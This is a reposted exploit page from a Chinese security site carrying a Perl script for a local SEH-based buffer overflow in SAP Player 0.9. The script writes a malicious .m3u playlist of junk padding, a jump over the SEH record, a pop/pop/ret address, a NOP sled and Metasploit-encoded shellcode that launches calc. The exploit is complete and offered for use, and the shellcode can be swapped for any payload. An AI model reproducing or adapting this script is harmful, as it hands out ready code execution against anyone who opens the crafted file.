首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SAP Player 0.9 (.m3u) Universal Local BOF Exploit (SEH)
来源:Www.Pentesters.Ir 作者:Platen 发布时间:2009-09-04  

#!/usr/bin/perl

print qq(
  ############################################################
  ##            Iranian Pentesters Home                     ##
  ##               Www.Pentesters.Ir                        ##
  ##              PLATEN -[ H.jafari ]-                     ##
  ## SAP player 0.9 (.m3u) Universal Local BoF Exploit(SEH) ##
  ## http://www.sorinara.com/sap/sap09.exe                  ##
  ## bug found & exploited by:  PLATEN                      ##
  ## E-mail && blog:                                        ##
  ## hjafari.blogspot.com                                   ##
  ## platen.secure[at]gmail[dot]com                         ##
  ## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder, Snake         ##
  ## and all members in Pentesters.ir                       ##
  ############################################################
);
$junk="\x41"x 35496;
$nseh = "\xEB\x06\x90\x90"; #short jump over SEH handler
$seh="\x27\x4a\x01\x10"; #universal p/p/r
$nop="\x90"x 100;
# win32_exec - Size=160
#EXITFUNC=seh CMD=calc 
#Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
open(fhandle,'>>expl.m3u');
print fhandle $junk.$nseh.$seh.$nop.$shellcode;
close(fhandle);
print "\n  [+] File created successfully: expl.m3u \n";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Hamster Audio Player 0.3a (Ass
·PPstream 2.6.86.8900 PPSMediaL
·Adobe Acrobat/Reader < 7.1.1/8
·PPstream 2.6.86.8900 PPSMediaL
·Microsoft IIS versions 5 and 6
·SIDVault 2.0e Windows Remote B
·Discuz! Plugin JiangHu <= 1.1
·DVBBS version 2.0 suffers from
·Linux Kernel < 2.6.19 udp_send
·CoolPlayer version 2.15 local
·Linux Kernel < 2.6.19 udp_send
·Microsoft IIS 5.0/6.0 FTP Serv
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved